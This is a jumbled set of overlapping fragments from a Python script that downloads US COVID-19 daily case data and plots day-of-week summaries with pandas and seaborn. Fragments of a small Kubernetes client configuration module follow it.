x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19", "data frame for reuse. 
return df # -- Data Processing: Load -- #", "[ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging --", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 |", "summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "else: return False def percent(num, denom): return 100 * num / denom def", "16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS #", "ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df,", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima", "# Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month", "figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig =", "df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease':", "mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn as sns", "= 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease',", "Debugging -- # DEBUG = True # -- Filesytem -- # ROOT_DIR =", "API -- the list of exportable objects (classes, # functions, etc.) -- when", "delta columns. 
df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local", "return df # -- Data Processing: Load -- # # -- Utilities --", "DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg',", "Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source data", "inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, )", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "= df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month']", "= '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== #", "import pandas as pd import seaborn as sns # =========================================================================== # # CONSTANTS", "Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def", "df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek #", "# Return data frame for reuse. 
return df # -- Data Processing: Load", "ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of", "DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure()", "period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def", "def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else:", "and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax", "df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow']", "std): return (x - mean) / std # -- Main Program -- #", "Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16,", "ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG and preview(df,", "series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if", "df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta']", "False def percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame,", "# # CONSTANTS # =========================================================================== # # -- Data -- # DAILY =", "else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0:", "extract_data() -> pd.DataFrame: # Download source data as CSV from an API. 
df", "seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== # # --", "transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and", "# FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def plot_series(df:", "| USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() #", "'../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # #", "summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame", "'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', )", "the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date", "seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)},", "def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the", "df = add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count", "(Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' #", "Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive':", "# Return data frame for reuse. 
return df def add_columns(df: pd.DataFrame): # Format", "'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define", "# MAIN EXECUTION # =========================================================================== # # -- Main Program -- # #", "df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns.", "{ 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df,", "sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA |", "ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame.", "import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS #", "frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig =", "# Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for", "= [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging", "'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020'", "(classes, # functions, etc.) 
-- when performing a \"wild import\" (`from field import", "= df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add", "as sns # =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') #", "Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG and", "= df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df", "#!/usr/bin/env python3 \"\"\" main.py - The main module for processing data and creating", "# =========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main Program", "and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') #", "def zScore(x, mean, std): return (x - mean) / std # -- Main", "def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) -", "columns. 
df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema", "= [ 'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # #", "-- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== #", "summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW,", "data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame):", "data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename", "f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return", "Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) #", "frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns.", "when performing a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG',", "data frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date. 
df.date", "Data Processing: Load -- # # -- Utilities -- # def lag_delta(series, period):", "axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed data.", "main.py - The main module for processing data and creating visual summaries for", "transform_data.__name__) # Return data frame for reuse. return df def add_columns(df: pd.DataFrame): #", "<NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # ===========================================================================", ") # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame", "data as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a copy", "# def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), )", "Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) #", "=========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY = 'weekly'", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "copy of the processed data. 
df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame.", "Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "= plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year", "= df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the", "rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns.", "data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "-- Debugging -- # DEBUG = True # -- Filesytem -- # ROOT_DIR", "DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure()", "'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # # -- Python", "# Return data frame for reuse. 
return df # -- Data Processing: Extract", "plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def", "-- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' #", "rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy", "row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if row['day1LagDelta'] <", "y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index.", "group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std',", "# Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df:", "df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== #", "as the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date'] =", "# Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean',", "'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG =", "-- when performing a \"wild import\" (`from field import *`). 
__all__ = [", "} DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] #", "New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data", "str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x", "def main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # #", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly", "for this study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__", "= plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name()", "DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df)", "df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df =", "frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date =", "fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease',", "CSV from an API. 
df = pd.read_csv(SOURCE_URL) # Save a copy of the", "# # FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def", "summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, )", "date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] =", "frame for reuse. return df # -- Data Processing: Extract -- # def", "Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def", "from an API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted", "Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's", "lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count", "Cases') ax.xaxis_date() # plt.show() # Debug data frame. 
DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png')", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug", "# =========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard Library", "x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease',", "# -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download", "'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week',", "copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame.", "import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd import", "pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of", "pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, )", "period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta']", "add_columns.__name__) # Return data frame for reuse. 
return df def rename_columns(df: pd.DataFrame) ->", "matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn", ") ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date')", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date',", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of", "return (x - mean) / std # -- Main Program -- # def", "# import os # -- 3rd Party -- # import matplotlib.dates as mpl_dates", "preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax =", "=========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main Program --", "'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease']", "# -- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as", "-- # # -- Utilities -- # def lag_delta(series, period): return series -", "__modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== #", "ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count", "data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults()", "# Debug data frame. 
DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df:", "summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) #", "local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return", "pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore(", "= 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16,", "ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |" ]
[ "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "writing, software # distributed under the License is distributed on an \"AS IS\"", "verify the servers SSL certificates? verify_ssl = True #: Enable debugging debug =", "api_token = \"\" #: API certificate cert = None #: Should the client", "KIND, either express or implied. # See the License for the specific language", "Unless required by applicable law or agreed to in writing, software # distributed", "\"\" #: API certificate cert = None #: Should the client verify the", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "# See the License for the specific language governing permissions and # limitations", "token api_token = \"\" #: API certificate cert = None #: Should the", "client verify the servers SSL certificates? verify_ssl = True #: Enable debugging debug", "utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache", "License. # You may obtain a copy of the License at # #", "most operations timeout = 20 #: Default timeout for streaming operations stream_timeout =", "the specific language governing permissions and # limitations under the License. \"\"\"Singleton configuration", "# limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server", "URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate", "law or agreed to in writing, software # distributed under the License is", "# Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache License,", "the License for the specific language governing permissions and # limitations under the", "License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\"", "compliance with the License. 
# You may obtain a copy of the License", "Authors # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "this file except in compliance with the License. # You may obtain a", "certificate cert = None #: Should the client verify the servers SSL certificates?", "Default timeout for streaming operations stream_timeout = 3600 #: Default size of Watcher", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #:", "you may not use this file except in compliance with the License. #", "the servers SSL certificates? verify_ssl = True #: Enable debugging debug = False", "API token api_token = \"\" #: API certificate cert = None #: Should", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "True #: Enable debugging debug = False #: Default timeout for most operations", "limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL", "FIAAS Authors # # Licensed under the Apache License, Version 2.0 (the \"License\");", "ANY KIND, either express or implied. # See the License for the specific", "-*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under", "debugging debug = False #: Default timeout for most operations timeout = 20", "in compliance with the License. # You may obtain a copy of the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "the client verify the servers SSL certificates? verify_ssl = True #: Enable debugging", "language governing permissions and # limitations under the License. \"\"\"Singleton configuration for k8s", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. 
# You may obtain", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "not use this file except in compliance with the License. # You may", "\"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert = None", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "Should the client verify the servers SSL certificates? verify_ssl = True #: Enable", "None #: Should the client verify the servers SSL certificates? verify_ssl = True", "#: API token api_token = \"\" #: API certificate cert = None #:", "False #: Default timeout for most operations timeout = 20 #: Default timeout", "timeout for most operations timeout = 20 #: Default timeout for streaming operations", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size = 1000", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "= None #: Should the client verify the servers SSL certificates? verify_ssl =", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "governing permissions and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\"", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "for the specific language governing permissions and # limitations under the License. \"\"\"Singleton", "#: Should the client verify the servers SSL certificates? 
verify_ssl = True #:", "k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token", "servers SSL certificates? verify_ssl = True #: Enable debugging debug = False #:", "OF ANY KIND, either express or implied. # See the License for the", "2.0 (the \"License\"); # you may not use this file except in compliance", "cert = None #: Should the client verify the servers SSL certificates? verify_ssl", "#!/usr/bin/env python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors #", "= False #: Default timeout for most operations timeout = 20 #: Default", "# you may not use this file except in compliance with the License.", "#: Default timeout for most operations timeout = 20 #: Default timeout for", "\"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #:", "client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token =", "permissions and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #:", "agreed to in writing, software # distributed under the License is distributed on", "server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server =", "(the \"License\"); # you may not use this file except in compliance with", "#: Enable debugging debug = False #: Default timeout for most operations timeout", "= True #: Enable debugging debug = False #: Default timeout for most", "specific language governing permissions and # limitations under the License. \"\"\"Singleton configuration for", "# # Unless required by applicable law or agreed to in writing, software", "express or implied. 
# See the License for the specific language governing permissions", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. # You may obtain a copy of", "= \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert =", "by applicable law or agreed to in writing, software # distributed under the", "verify_ssl = True #: Enable debugging debug = False #: Default timeout for", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under the", "debug = False #: Default timeout for most operations timeout = 20 #:", "= 20 #: Default timeout for streaming operations stream_timeout = 3600 #: Default", "either express or implied. # See the License for the specific language governing", "<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "#: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\"", "configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API", "2017-2019 The FIAAS Authors # # Licensed under the Apache License, Version 2.0", "may not use this file except in compliance with the License. 
# You", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Enable debugging debug = False #: Default timeout for most operations timeout =", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache License, Version", "Default timeout for most operations timeout = 20 #: Default timeout for streaming", "file except in compliance with the License. # You may obtain a copy", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License for the specific language governing permissions and # limitations under the License.", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "the License. # You may obtain a copy of the License at #", "to in writing, software # distributed under the License is distributed on an", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "The FIAAS Authors # # Licensed under the Apache License, Version 2.0 (the", "implied. 
